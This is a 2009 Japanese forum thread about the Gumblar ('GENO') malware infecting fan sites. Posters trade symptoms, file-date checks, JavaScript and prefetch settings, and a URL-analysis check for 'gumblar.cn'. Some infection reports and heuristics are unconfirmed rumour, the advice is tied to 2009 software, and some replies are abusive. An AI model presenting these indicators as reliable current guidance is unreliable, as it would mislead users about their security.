 ※一部のIDSはサーバスクリプトへのクエリを監視しており、クライアント側でやられても判断できない
感染が容易と思われるPC環境をよりピンポイントに判断している(このため、セキュ各社の自動検出が難しくなっている)
感染しない環境には何も返さない(更に検証が難しい)
亜種の「更新」の頻度が異常にすばやく、亜種がほとんどのセキュソフトを潜り抜けているので、シグネーチャ・ベースでの検出が難しい
 ※検出率が上がる頃には次の種類になっている

感染の疑いがある場合
XP / 2000 の方は sqlsodbc.chm をチェックしてください。
※sqlsodbc.chmを使わない亜種の存在が確認されていますので、この方法に完全に頼るのは危険かもしれません。
ttp://www3.atword.jp/gnome/zlkon-gumblar-%E5%95%8F%E9%A1%8C%E3%81%AB%E9%96%A2%E3%81%97%E3%81%A6/

うへええええええええええええ

130 :GENO:2009/05/16(土) 13:44:09 ID:WLfUqDeU0
>>125
これそのまま貼付けられたらブラウザによっちゃ挙動おかしくならないか?
閉じてないし

131 :GENO:2009/05/16(土) 13:44:29 ID:0gY22C790
因みにノートン入れてるPC[A]とバスター入れてるPC[B]で検証してみた結果なんだけど
※どちらもWEB監視を起動させたまま

IEでノートンを入れてブラウザ常駐させてる場合→検出
IEでウイルスバスター入れてブラウザ常駐させてる場合→検出無反応

だったよ
他のブラウザだとスレイプニルでもやってみたけど
スレイプニルはどっちのアンチウイルスでも無反応だったよ
因みに上記2台はLAN接続などせず独立でネットに繋いでそれぞれ検証
普段はネット繋がってない機種にアンチウイルスインストールしてやってみたので
現在はネットから切ってます

132 :GENO:2009/05/16(土) 13:45:33 ID:46CRPLWL0
>>120
ありがとう
>>68にも書いたけど
SEED (DESTINY)同人サイト感染してるかもしれん
と思ったら>>125のは入ってないみたいだった



133 :GENO:2009/05/16(土) 13:45:35 ID:x7enN2xd0
幸管理人だが、さすがに登録サイト全部回るのはきっついなあ…
見つけたら報告してくれ、ってのはありかな?
※ウィルスのことは告知済、まとめサイトにはリンク貼ってる。

134 :GENO:2009/05/16(土) 13:45:39 ID:Q03uMX6X0
>>130
いやいや普通に最初の数行でしょうよ>>125

135 :GENO:2009/05/16(土) 13:45:42 ID:QEvo2/9u0
ここ1ヶ月くらいでサイトの閲覧者数が激減したのは
このウィルスのせいでみんな巡回を怖がってるせいだよな!









…そう思いたい…(´・ω・`)

136 :GENO:2009/05/16(土) 13:46:38 ID:favl3anr0
>133
むしろ現状の対策で対処しきれない亜種が出たとき
幸管がそれにひっかかったら目も当てられないわけで

137 :geno:2009/05/16(土) 13:46:52 ID:UbHMMecD0
今知った……

確認したいんだけど、ググったりFAQとか見てもMacまの字も出て来ないってことは
これMacは大丈夫なんだよね?

138 :GENO:2009/05/16(土) 13:46:58 ID:TV+NV+ev0
>>127
資料探しの旅にも出れんのがあれだが仕方ない

139 :GENO:2009/05/16(土) 13:47:01 ID:O52pyEMd0
>>135
誘い受けならチラシででもやってろ糞ヘタレ

140 :GENO:2009/05/16(土) 13:47:47 ID:JwtE7gIP0
>>135
うちは激減するほど閲覧者がいないんだぜ
リンクページがないんだぜ

141 :GENO:2009/05/16(土) 13:47:49 ID:5lkXxW8S0
>>138
しゃーない
図書館か本屋でも巡るさ

142 :GENO:2009/05/16(土) 13:47:59 ID:II0XfVpi0
コマンドやらは正常に出る
サイトもってない
ファイルサイズは50,727 バイト
更新日は‎2006‎年‎11‎月‎

同人サイト見てまわってたので心配なんだが大丈夫だろうか
今ちょっとフレッツウィルスクリアでスキャン中

143 :GENO:2009/05/16(土) 13:48:07 ID:3WfRqqkb0
>>138
それが痛いんだよね
あーあれなんだっけ?って思った時にさくっと検索できないつらさ

144 :GENO:2009/05/16(土) 13:48:31 ID:T9YpF4NP0
>>138
ああ〜…そうだった…資料探しの旅に出られないのはきつい…。
一応対処法は一通りやってガチガチ固めではあるけど…。

145 :GENO:2009/05/16(土) 13:48:41 ID:JwtE7gIP0
>>137
「今のところは」ね
絶対はないから


146 :GENO:2009/05/16(土) 13:49:06 ID:x7enN2xd0
>133
一応、全てのブラウザでJS全切りしたから大丈夫だと思いたい…
更新もFTP使うのやめるわ、当分の間。

147 :GENO:2009/05/16(土) 13:49:10 ID:yagAmRb40
>>137
「今は」まだ大丈夫

148 :genoside:2009/05/16(土) 13:49:20 ID:LE8VkF+J0
こういうときは写経

149 :GENO:2009/05/16(土) 13:49:35 ID:2l2WFVGe0
>>137
問題になってるファイルは全部窓にしか存在しない

150 :GENO:2009/05/16(土) 13:50:21 ID:ob9gRjpu0
>>137
とりあえず新mac板とセキュリティ板あたり見てこい

151 :geno:2009/05/16(土) 13:50:37 ID:lGXsY/+00
さっき自スレで知って火狐とNOSCRIPT入れてきた

PIXIVに注意画像アップ来てるね
少しでも多くの人の目に付いてほしい

152 :GENO:2009/05/16(土) 13:50:49 ID:TFkyZp720
           ,rュ、__
           fヽ、〕   ``丶 、
         辷_|       `丶、
         (_-‐!             ヽ、_ _
          r'二!         ´      ̄ >ー ' ´  ̄   ̄  ー - ._
           )-、{        _ __ _                 __,z‐マ¬n
         (_>}    ,ィ7丁//////7t-、__         ,r<\ソ^trヘ.}
         ヽュ,廴.ィ斥r'^ー'⌒ー'⌒ー'⌒ーく/ ハ.__      ,r'こ>'⌒′ ハ、丿
          に匁チ‐'".:.:;:.:.:.:;.:.:.:.;': : ;': : : : :└く } }ト、  rく\ 丿     /ーf´
         ,ィ夕'".;:;:';:::::;:': : ;:': ::〃::/:: : : :/:::i: : :`y' ∧く.`Y⌒´     ∠^Y
       //〃.::;:'/;'::::/ : :/::::://:://! ::::::i:!:::|:!:::::::`ーj^ァ_>′     ∠ヽ_ソ
        `Y!:j .::::i::l:j::,::l: : j :::::jl !:::|l:l:| ::::::i:|:::l:|::::::::i:::(/ h   , -o-< ヽ`〈
             / /V  ヽ l\|:イ .:ト- ヘ  .:.ト.:イ|― l:. |    ,.ィ
      _ .ィ'¨i l./!  : : :| .:{ムト、|:!   !斗≦_|ハ:|l.  |::.|__.. イ´ム
    _j´/_ノー'^Vl,┴j:| ..:. .::|:イ{ィ示ミ「 ` 「イ示ヽト、l!|  !´了/´ /
    j ノ-'  /´  ,イ.::A.:.|:.小ト.トィ{::j:}  /' トィ{::j::} }小  |__rく´  z′
    ´ > - ' ┬ ´ l:..:ト.V!:.:||  辷ソ     ゙辷ソ | r┴‐ァーく    あばすとー
     .小.   /l|   ヽトzハl:! '''    ′   ''''  |  `lニ^ーァヘ、
    /! !lト  i|l.|      /.:..八    r======、、    | く⌒ー'  `ァ'´.ィヽ
.   /'|ト._ハ V !||    {:.ィ:.:ト{ヽ.  {.  ´ ̄ ̄ }  .ィ| .:下ミ.、__`¨´_, ト、
  / ハ|{ |ハ.Vハ!__ri―く ヽ:|  }>`.. ̄ ̄ .´イ/_j .::.::| / ̄|ト、  !! lヽ.__
  |||l.| l  l !| | ` l   l  ヽ  {ト vミ、工二= ´ /´イ.:.:.:.:!   /!!|ハ j ! j lヽ.

153 :geno:2009/05/16(土) 13:50:50 ID:rHuvw5CU0
俺のドリームキャストが火を噴く時が来たな

154 :GENO:2009/05/16(土) 13:52:36 ID:6J5/nTOQ0
javascriptタグのとこにevalが入ってたらGENO感染確定だっけ?

155 :GENO:2009/05/16(土) 13:52:52 ID:wdSrOYCq0
>151
アップしてきたもんです
ここやまとめサイトから文章借りました

アマゾンやスクエニ、集英社は問題なし?

156 :GENO:2009/05/16(土) 13:53:07 ID:Q+C8SNXE0
印刷所のサイトも感染したらシャレにならんな…

157 :geno:2009/05/16(土) 13:54:15 ID:wQTybYbw0
グレンラガンのスレでもこのウィルスっぽい感染が報告されてた

158 :GENO:2009/05/16(土) 13:54:26 ID:V9V0BvaO0
企業は感染を直した後に知らんぷりすることがあるから困る


159 :geno:2009/05/16(土) 13:55:22 ID:UbHMMecD0
137っすアンガト

mac板見てくるよ
感謝のしるしにage

160 :GENO:2009/05/16(土) 13:55:24 ID:uACsvbNb0
>>155
その3つはガセ説濃厚かも

161 :GENO:2009/05/16(土) 13:55:35 ID:lGXsY/+00
>>155
乙です。
とりあえず尼さんは今のところ白みたい。

考えてみたら、js切ってると評価できないね
一時的にって言うのが良く分からなかったから、評価の時だけIE使ったけど

162 :GENO:2009/05/16(土) 13:55:36 ID:0gY22C790
グレンのスレ怖い報告が来てるよ
fc2のブログで感染を確認だそうな・・・
ブログで感染て・・・それfc2の鯖元に言った方がいいんじゃないか?

163 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 13:56:14 ID:SpwLg/1F0
>>151
火狐は、デフォが検索結果先読みだから
about:configもいじったほうがいいよ

164 :GENO:2009/05/16(土) 13:57:04 ID:BfrfM/sk0
この騒ぎにgkbrして新マカ板のウィルススレ見てきたら
『ブルースウィルス』ってレスが一番最初に目に飛び込んできた…

とりあえず自サイトでも注意喚起しといた

165 :GENO:2009/05/16(土) 13:57:57 ID:nXokdaXSO
ここのテンプレの一部、借りていいですか?
自サイトに注意喚起として、wikiと一緒に張り付ける文章がうまくできないんだ・・・


166 :GENO:2009/05/16(土) 13:57:58 ID:BfrfM/sk0
さげちゃったゴメン

167 :GENO:2009/05/16(土) 13:58:05 ID:RwVE/EfH0
グーグルクロームでjavaスクリプト切るのってどうすればいいんでしょう?

168 :GENO:2009/05/16(土) 13:58:07 ID:BpSFSHPIO
>>162
fc2ブログだと!?

うわああああやばいじゃないか!orz

169 :GENO:2009/05/16(土) 13:58:10 ID:D0CXquaI0
n即とかにはスレないんだなあ

170 :GENO:2009/05/16(土) 13:58:38 ID:A9qSW+uH0
>>162
GENOのコードが記事にまんま貼り付けてあって、
それにAvastが反応したんじゃないの?
知恵袋でそういうことがあったぞ

171 :GENO:2009/05/16(土) 13:58:41 ID:BwjGILReP
>>153
なwwwつwかwwしいww

172 :GENO:2009/05/16(土) 13:59:05 ID:TE1oPb0X0
前スレより
確定情報じゃないけど、sqlsodbc.chmの更新日が3/21の人は要注意っぽい


71 :GENO[]:2009/05/15(金) 23:37:04 ID:ax1yfWaoO
ファイル最終更新は3月21日だった
…流行る前ってことは、単なる別要因?

312 :GENO[sage]:2009/05/16(土) 02:00:17 ID:gSw5ImT40
sqlsodbc.chm サイズ1.29 KB (1,323 バイト) orz

3年以上前に買ったPCなのに更新日が3月21日だった
>>71と一緒だこりゃ怪しい

355 :GENO[sage]:2009/05/16(土) 02:19:30 ID:/LJ35F6B0
222 名前:名無しさん@お腹いっぱい。[] 投稿日:2009/05/15(金) 21:12:56
カスペオンラインスキャン、avastでもウイルス検知されなかったんだけど。
sqlsodbc.chm 1.29 KB (1,323 バイト)が改ざんされたっぽいんだが、
更新日時が3/21なんです。
これって、感染してるんでしょうか?



ここで報告してる人もいるけど、3/21はアウトっぽいな

695 :GENO[]:2009/05/16(土) 09:38:28 ID:lVU/fMVd0
sqlsodbc.chmが1.29 KB (1,323 バイト)
更新日は2009年3月21日
cmd.exe、regedit.exeは立ち上がらねぇ

真っ黒ってこったな


173 :GENO:2009/05/16(土) 13:59:42 ID:I9RTq+StO
低レベルな質問で申し訳ない
自分のPCが感染してなければ自サイトも感染しないんだよね?
(感染者が閲覧しても問題ない?)

後はネット断ちしてれば今後の感染の恐れはないよね

174 :げの:2009/05/16(土) 13:59:44 ID:E5X0E7UxO
FC2ブログでマジか?グレンスレのあれは確定なの?

175 :97:2009/05/16(土) 14:00:34 ID:JEMtfEwSO
感染ファイルの情報も欲しい人いるみたいだから書き込みしてみようと思っただけで
ここのおかげで対策はわかってるよ
忠告ありがとうノシ
ftpに繋がらないのもウィルス関係あるのかと思ったんだけどまあ関係ないのかな

もはや窓しか持たない人間には携帯が一番安心だ

176 :GENO:2009/05/16(土) 14:00:38 ID:WLfUqDeU0
>>134
いや、ウィルスだからって意味じゃなくてタグ貼り付けて平気なのかと思って
特殊文字を全角に置き換えるとかさ

177 :げの:2009/05/16(土) 14:00:40 ID:bBW4k3I0O
>>162

うち、FC2ブログ使ってるから怖いな。

ひとまずどうすりゃいいんだろう。

プライベートモードにしてパス掛ければ、危険は減るのか?

178 :GENO:2009/05/16(土) 14:00:41 ID:x7enN2xd0
>167
切れない。もしくはコマンドラインで起動。

179 :GENO:2009/05/16(土) 14:00:56 ID:QEvo2/9u0
>>162の情報が確定だと鯖内に置かれた全ブログがアウト?
>>170の事例であって欲しいな…KOEEEEE!

180 :GENO:2009/05/16(土) 14:01:19 ID:S61Xx5r30
>>65
福本作品のは「逆境」ではなく「越境(クロスオーバー)」だと思います

181 :geno:2009/05/16(土) 14:01:32 ID:KBaZxwMuO
>>153
DCが火を噴くところを見てみたいwwwww

182 :GENO:2009/05/16(土) 14:01:38 ID:i6/Zrtyj0
ブログの感染が関係あるかはわからんが、FC2ホームページのトップには
少し前からこんな警告文が記載されている


【FC2】ホームページをご利用のお客様へ重要なお知らせです。
平素はFC2をご利用いただき、誠にありがとうございます。

最近ホームページにてiframeタグによる改ざんによりウィルスが埋め込まれてしまうサイトが増えております。

現在弊社側で感染しているウィルスファイルの駆除を実施しておりますが万が一、他のお客様もウィルスに感染されません様大変お手数ですが、こちらの対策として以下の事を実行して頂きます様お願い申し上げます。

【ウィルスサイト対応策】
・FTPパスワードを複雑なものに変更する事
・WindowsUpdateを実行する事
・ウイルス対策ソフトを最新状態にする事
・ウイルススキャン、スパイウェアスキャンをかける事
・お使いのブラウザの脆弱性によりウィルスに感染した可能性もございますので InternetExplorerをご使用の場合は
FirefoxまたはOpera等を使用する事。

情報処理推進機構:情報セキュリティ: Internet Explorer の脆弱性(MS08- 078)について
参考URL: tp://www.ipa.go.jp/security/ciadr/vul/20081218-ms08-078.html

ご利用の皆様には大変ご不便をお掛けしますが、ご協力のほど何卒宜しくお願い申し上げます。
-----
FC2,inc

183 :GENO:2009/05/16(土) 14:01:55 ID:RwVE/EfH0
>>178
了解。火狐いれなおします

184 :GENO:2009/05/16(土) 14:02:03 ID:lapl18Rv0
>169
n速は何度かスレ立っては落ちたらしい

唯一参加してる幸が注意喚起UPしてくれてた

185 :ネ困:2009/05/16(土) 14:02:55 ID:wdSrOYCq0
>160-161
ありがとう


186 :げの:2009/05/16(土) 14:03:05 ID:eBDfFPMrO
ソース出てない感染元に大騒ぎする人や、ここの1から読めば解決するような
質問する人が度々出るなー
とりあえず餅つけ

187 :GENO:2009/05/16(土) 14:03:08 ID:20g6NkEqO
携帯よかPSPじゃね
書き込む必要がなければ

188 :GENO:2009/05/16(土) 14:03:17 ID:78eQrFbR0
初心者ですんません
とりあえず初心者用にsqlsodbc.chmを探すところから始めたんだけど
SQLSODBC.CH_ ってのしか出てこなかったんですが…これは…?
一応サイト持ちじゃないと記述しておきます

189 :geno:2009/05/16(土) 14:03:23 ID:KBaZxwMuO
今回だけは携帯厨有利だな
いろいろと

190 :GENO:2009/05/16(土) 14:03:42 ID:Y970IERC0
>>153
電源コードはよく確認しておけよ

191 :GENO:2009/05/16(土) 14:04:29 ID:9ESkYQMb0
非常駐型ウイルススキャンソフトならClamWinもおすすめ
オリジナルはLinux・Mac用のClamXavだけどコンパイル済みファイルの
感染も深部まで潜ってえぐり出すので精度はかなり高い(時間はかかる)。

192 :geno:2009/05/16(土) 14:04:33 ID:jxRVr/+e0
>>182
それはネトゲの垢ハックウイルス関連だ
今回も似たようなもんだけどさ

193 :GENO:2009/05/16(土) 14:04:38 ID:GfLVqANbO
>>182
前スレでも書かれたが、それは違うウイルスだし問題内容も違う
しかもパッチが2008年のものだから古すぎる

194 :GENO:2009/05/16(土) 14:04:45 ID:0gY22C790
>>170
グレンのスレを見れば判るけど
 よく見かけた とある
これは複数ブログがそうであったという風に読めるよ
恐らく一箇所ではないんだろう・・・分らないけど!

自分のジャンル晒すけど
ヘタリアのご本家がfc2なんだよ
もしfc2ブログがアウトでfc2の鯖がやられてるとしたら
ヘタ者は漏れなく全員アウトだぞ・・・

こんな恐ろしいことがあるかよ・・・
杞憂であって欲しい・・・絶対に杞憂であれ

195 :iframe:2009/05/16(土) 14:05:12 ID:TE1oPb0X0
>>182
fc2のブログ使ったこと無いからわからんけど、
iframeタグ入れられるのならfc2自体は感染してなくて
iframeから引っ張ってきてるhtmlにウィルス埋め込まれてるパターンじゃないの
だからfc2ブログ全部感染してる、オワタ!って叫ぶのは待ったほうが

196 :GENO:2009/05/16(土) 14:05:19 ID:O52pyEMd0
>>188
電源切ってケーブル引っこ抜いて寝てろ
初心者ですを言い訳にするなカス

197 :GENO:2009/05/16(土) 14:05:36 ID:Fp/E32vW0
>>182
これはFC2のブログに関してじゃなく
FC2でサーバーをレンタルしてる人宛てだね

FC2ブログ自分も使ってるが
確認したら取りあえずなんともなかった
FC2ブログはblog101 blog102… ってかんじでサーバーがわかれてるから
どのサーバーでウイルスが確認されたかが問題なんだけど…

グレンラガンスレじゃFC2ブログに関する情報は
>グレンではTALのサイトやFC2系のブログでよく検知されてたよ
だけなんだね

198 :GENO:2009/05/16(土) 14:05:41 ID:BwjGILReP
>>194
鯖ったってあんた、fc2の鯖いくつあるとお思いで

199 :げの:2009/05/16(土) 14:06:12 ID:NuFhOVq00
多分PC板のスレだったと思うんだけど、
感染の疑いがあるURLをオンラインでチェック、
結果のテキストになんとか.cnがあったらクロ…
みたいな書き込みがあったんだが、あまりにいろんなスレみててw
見失ってしまった。
だれかそのURLが判る人いますか?

200 :名前欄にスレ名入力推奨@自治スレにてLR改:2009/05/16(土) 14:07:47 ID:yEZ+iDvc0
>>199
これか?

サイトが感染してるのかわからない人は
http://wepawet.cs.ucsb.edu/
にアクセスするといいかも、とのことです。

ここで「URL」と書かれている右のフォームに
感染が疑われるURLを入力。
「Resource type」のチェックボックスは「JavaScript/PDF」にチェックを入れ、
「Submit for analysis」をクリック。
すると解析結果が出るので、Ctrl+Fをタイプしてページ内を「gumblar.cn」で検索。

(何も見つからなければ少なくとも現在は感染していない。
 見つかればそのサイトは感染している。 )

201 :GENO:2009/05/16(土) 14:07:58 ID:A9qSW+uH0
>>194
グレンのスレの報告内容見たが、
「感染してることをサイト管理者に教えてあげたいが、
見るだけで感染するから閲覧出来ない」って言ってるくせに
「よく検知された」とも言ってる。妙な話だぞ。

サイトもブログも見ずに、何を見て検知を確認したんだ?


202 :2:2009/05/16(土) 14:08:39 ID:n/uQJHr/0
>>2の中の者です
199まで情報反映済み(漏れがあったら指摘お願いします)
FC2については憶測の域を出てないので様子見してます
何か分かり次第このスレに報告お願いします

感染ジャンルについてなんだが、ジャンルスレまで見に行く余裕がないので
GENO感染かどうか自分では判断できない
ジャンル名を載せるのは該当・近隣ジャンル者への注意喚起が目的だと思うので、
【疑わしいものは全て載せていく】という方針で行くけどいいかな?

現時点で感染してなくても警戒は必要なわけだし、問題ないと思うんだが
もしマズかったら指摘してくれ

203 :geno:2009/05/16(土) 14:08:57 ID:gn9vKAuV0
・window98、オンラインスキャンのみに頼ってる
・ウイルス一つ検出・駆除、FTTTPとサイトのフォルダを消した
・JAVAは切ってる

あとパス変更以外に気をつける事ありますか?

204 :げの:2009/05/16(土) 14:09:32 ID:tRYHiqa3O
>>199
>>15でなくて?

205 :GENO:2009/05/16(土) 14:09:56 ID:/zJVQLCd0
>>47
逆境じゃなっくて越境w
逆境になるとカイジアニメだ

206 :げの:2009/05/16(土) 14:10:20 ID:NuFhOVq00
>>200
おお、それだ。d!

207 :genoside:2009/05/16(土) 14:10:21 ID:LE8VkF+J0
>>203
なんて名前のウイルスだったの

208 :GENO:2009/05/16(土) 14:10:45 ID:E/Hkrb7LO
>>203
98を窓から投げ捨てる

209 :GENO:2009/05/16(土) 14:10:51 ID:U5PZPUMdO
VISTAだがregが一瞬しか開かない・・・
UACは切ってなかったはずなのに
cmdは開いた。Windowsアップロードには繋がる
sqls〜はコンピュータ→ctl+Fで検索したけど無かった
0409と0411の両方探したけど無かった
テンプレの他の症状は今のとこ見られない

これは亜種にかかったと判断するべきなのだろうかorz

210 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 14:11:04 ID:lNw7vIqL0
>>203
OSをアップグレード、アンチウイルス導入
できないなら今の環境ではネットに繋ぐの止めましょう

211 :GENO:2009/05/16(土) 14:11:14 ID:lapl18Rv0
>202
乙です
疑わしきは全て載せる、で良いと思う
現実的に感染ゼロのジャンルの方が少なさそうだし

212 :GENO:2009/05/16(土) 14:11:20 ID:/ifCeInG0
最初に感染したサイトって、どこからウィルス流入したの?
外部からhtml書き換えられたような記述があったけど、

例えば、現時点で自分のPCもサイトも感染してない、
私が完全にネット断絶してれば、私のサイトはそのまま放置でも安全なのか?

213 :geno:2009/05/16(土) 14:11:26 ID:5qGyw+II0
>>203
みんなの為に窓から投げ捨てる

214 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 14:11:36 ID:we2SERvA0
>>201
サイトにアクセスしたら、アバストが大激怒
それ以上先には絶対進めないってことかなとオモテタ

215 :GENO:2009/05/16(土) 14:12:27 ID:LZxxGYzu0
>>212
http://internet.watch.impress.co.jp/cda/news/2009/05/14/23435.html

他に2ch、楽天などで感染報告アリ

216 :GENO:2009/05/16(土) 14:12:53 ID:hey4UlmQ0
むしろブログで注意しなきゃいけないのは
記事内のリンク先や広告先がウイルスに冒されている可能性がある事じゃないか?

ブログトップの説明文か、先頭固定記事として
「これこれこういうウイルスが流行ってるから
リンク先に飛ぶ場合は注意しろ」とでも書けばいいとおもう

217 :げの:2009/05/16(土) 14:13:01 ID:E5X0E7UxO
グレンの人はもう少しちゃんとした情報くれよ…

218 :げの:2009/05/16(土) 14:13:08 ID:zCNyBC/V0
>>209
普通に調子の悪いPCと言う可能性も捨てきれないけどねえ
とりあえず一応対応しているアンチソフトでスキャンしまくったら?
サイト持ちだったらサイトのファイル確認は勿論と
安心できるまで一時閉鎖で
サイトがなければ他所へ拡散する心配は無いからね

219 :GENO:2009/05/16(土) 14:13:24 ID:A9qSW+uH0
>>214
そんならソフト名ぐらい書いててもおかしくなさそうなんだけどなー
アバストのアの字もないし釣り臭さプンプンする

220 :GENO:2009/05/16(土) 14:14:09 ID:2l2WFVGe0
あとXSS対策されてないスクリプトとかフォーム(特に自作)とかも要注意だね

221 :げの:2009/05/16(土) 14:14:33 ID:zCNyBC/V0
>>212
サイト管理者が無事でも
サーバー管理者がアウトだったら\(^o^)/オワタ

222 :GENO:2009/05/16(土) 14:15:39 ID:Y970IERC0
グレンスレ見てきたけど、まだ書き込み一つきりだから何ともいえないな
ジャンルは違うけど、自分のブックマークに入っているFC2ブログは今のところ大丈夫っぽかった
なんにせよ「白とは言い切れない」「今のところは大丈夫」という心構えで自衛するしかない

223 :GENO:2009/05/16(土) 14:15:52 ID:U5PZPUMdO
>>209アップデートだった

224 :geno:2009/05/16(土) 14:17:42 ID:KBaZxwMuO
あげていこうぜ

225 :げの:2009/05/16(土) 14:18:08 ID:eBDfFPMrO
>>214
自分もだ
avast検知でコレ出ると強制切断で見れないんだよね
管理人に知らせる方法思いつかなくて歯痒かったな

226 :GENO:2009/05/16(土) 14:18:50 ID:LZxxGYzu0
>>225
鯖官に直接知らせればいいだろ

227 :geno:2009/05/16(土) 14:19:55 ID:LZeGKG6l0
鯖管に知らせに行くための服がない

228 :GENO:2009/05/16(土) 14:20:39 ID:U5PZPUMdO
>>218
サンクス
とりあえずウイルスバスターでは検出できなかったから他も色々入れてみる

229 :GENO:2009/05/16(土) 14:21:09 ID:NddsKjpSO


裸で何が悪い!

230 :GENO:2009/05/16(土) 14:21:24 ID:GfLVqANbO
>>209
管理者権限のあるユーザーでログインしてる?
権限がなかったら見られないかもしれない
あとフォルダオプションで隠しファイルを見られないようにしてる可能性もある

ちなみにUAC有効でもプロンプトが普通に開けるのは普通
GUI使わずにプログラムを実行するDOS時代から続くツールだから

231 :GENO:2009/05/16(土) 14:24:03 ID:c6aZl6Ug0
全く関係ないかもしれんが、昨日妹が履歴書の書き方ぐぐってたらAvastに怒られたっつってた
慌てて色々調べてここに辿り着いてスキャンしたり確認したらPCはセーフだったんだけど、コレ相当広まってるのな…

232 :2:2009/05/16(土) 14:24:41 ID:n/uQJHr/0
>>209
まさかとは思うが、reg.exe開いてない?
自分もVistaで感染してないか調べようとしたとき、検索窓にregまで入れて、
出てきたreg.exeを開いたら一瞬で消えて焦った
regeditまで入れないとregedit.exeは出てこないので念のため

233 :GENO:2009/05/16(土) 14:24:52 ID:tmsaJDjQ0
すみません、大慌てで火狐導入したんですが、javascriptを無効にするというのはどうすればいいんですか?


234 :GENO:2009/05/16(土) 14:25:18 ID:/ifCeInG0
212だけど、
>>221
なるほど…あと広告の感染もか…
引き篭もりつつ、自分のサイトは常にチェックしていないとだな。

235 :GENO:2009/05/16(土) 14:25:45 ID:/m6gQ1ZiP
NO script

236 :geno:2009/05/16(土) 14:26:49 ID:LZeGKG6l0
>>233
PCを窓から




ツール→オプション→コンテンツでjava scriptを有効にするのチェック外す

237 :geno:2009/05/16(土) 14:26:55 ID:5qGyw+II0
>>233
ツール→オプション→コンテンツ

238 :GENO:2009/05/16(土) 14:26:57 ID:2l2WFVGe0
アドオンいれなくても設定でjavascript切れるよ火狐

239 :GENO:2009/05/16(土) 14:27:04 ID:5dy38PGO0
>>233
122 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 14:04:13
NOscriipt入れなくてもツール→オプション→コンテンツでjava scriptを有効にするのチェック外せば大丈夫よ

240 :GENO:2009/05/16(土) 14:27:06 ID:bQAw9ln80
まとめサイトに丁寧に情報かいてあるのに何で読まないで質問するんだろう。

241 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 14:27:17 ID:b/+eltGS0
>>233
ツール→オプション→コンテンツでJavaScript有効にするをはずす

242 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 14:27:42 ID:NCQvc8VZ0
カスペラキーのオンラインスキャン、失敗ばかりで出来ないんだが
他に手軽にウイルススキャン出来るサイト無い?

243 :geno:2009/05/16(土) 14:27:56 ID:lNw7vIqL0
>>233
ツールバーのツール→オプション→コンテンツ
でチェックはずす

244 :げの:2009/05/16(土) 14:28:12 ID:zCNyBC/V0
>>233
感染サイトを閲覧しない限りは自分が感染することも無い
焦らずじっくりまとめサイト読んで行こうぜ

245 :GENO:2009/05/16(土) 14:28:14 ID:9ESkYQMb0
>233
 ググれかす

246 :GENO:2009/05/16(土) 14:28:43 ID:x7enN2xd0
意地でもネットサーフはやりたい。しかしJS切りっ放しだとめんどい。ので考えてみた

安全な方法としては
JS切ってサイト閲覧→サイトのソースチェックして未感染を確認→JSをONにする
を毎回やれば安全かな。

IE用のタブブラウザDonuts、JSのON、OFFが簡単に出来たような記憶が。
火狐どうも合わないから、これ使ってみようかな。

247 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 14:28:54 ID:EKPYjVdC0
>>231
URLわからない?
そこならば同人関係ないでしょう。

248 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 14:29:02 ID:LZeGKG6l0
>>242
ニフ、bit

249 :GENO:2009/05/16(土) 14:29:05 ID:dUhoo+Zw0
>>242
ニフティ

カスペでやってくれるよ

つかマジでみんな、まとめとログくらい読もうぜ…

250 :GENO:2009/05/16(土) 14:29:07 ID:2l2WFVGe0
今はググレカスは危険

251 :GENO:2009/05/16(土) 14:29:41 ID:l/Im8ln/0
みんな優しいな

252 :げの:2009/05/16(土) 14:30:05 ID:1bGHdkMNO
Operaはアウト?火狐も入れるべきか

253 :げの:2009/05/16(土) 14:30:18 ID:87m04VM3O
そういえばようつべとニコ動は平気なの?

254 :GENO:2009/05/16(土) 14:30:33 ID:YXeXSazI0
前スレでワンピース個人サイトも感染って書いてあった。

255 :GENO:2009/05/16(土) 14:30:36 ID:5dy38PGO0
ああググレカスは危険だな。以下レスを抽出したものコピペ

------------------------

FirefoxはデフォルトだとGoogleのリンク先先読み設定あるから、
about:config で network.prefetch-next を falseにしとけ。

Firefoxのアドレス欄にabout:configってコピペ、Enter(ここで許可を求められたら許可する)
ずらずらーーーーーってアルファべ順に出てくる項目の中から
network.prefetch-nextを探して選択、右クリで切り替えを選択しtrueをfalseに変更

Firefoxの先読みをOFFにするとインターネットが遅くなるがガマンしろな!

256 :GENO:2009/05/16(土) 14:30:38 ID:E5X0E7UxO
ググらないでカス
まとめサイトをまず見るカス

257 :GENO:2009/05/16(土) 14:30:40 ID:EMBvaapG0
感染疑い者は>2で殆ど事足りるのでは

258 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 14:31:15 ID:DHJ80vRC0
オススメのブラウザって火狐だけ?
この際だから完璧に乗り換えようと思うんだけど、
使いやすさとかも含めて何かおすすめあれば教えてください

259 :233:2009/05/16(土) 14:31:15 ID:tmsaJDjQ0
すみません、書き込んだあとにすぐできました…見落としていたようです
教えて下さった方ありがとうございました!
自サイトのトップにもまとめページへのリンク等してきました

手ブロの方でも注意記事がいくつか上がってますね


260 :GENO:2009/05/16(土) 14:31:28 ID:IzNIP73HO
アバストは検出してくれるんだな。

そういえば月曜日にアバストが怒ったサイトがあった。
管理人に連絡しなかったけど。
輪かサーチで行ったとこだから、どこだったかも覚えてない。
ちなみに特撮サイト

261 :げの:2009/05/16(土) 14:32:15 ID:20g6NkEqO
火狐はスクリプトオフに加えて先読み禁止をやらなならんのじゃろ
じゃないと怖くてぐぐれない

262 :GENO:2009/05/16(土) 14:32:41 ID:Gh3ZB53n0
■アニメ系
01.エヴァ(小説サーチ) / 02.忍たま乱太郎 / 03.ガンダム00 / 04,プリキュア / 05,天体戦士サンレッド
06.コードギアス / 07.レッツ&ゴー / 09.イナズマイレブン

■少年漫画【週刊飛翔系】
01.リボーン(プチオンリー告知サイト・ファンサイト) / 02.テニミュ(ファンサイト)03.ジョジョの奇妙な冒険
04.ワンピース / 05.デスノート / 06,D.Gray-man / 07.遊戯王無印
■少年漫画【その他】
01.鋼の錬金術師(オンリー告知サイト) / 02.コナン
■青年漫画
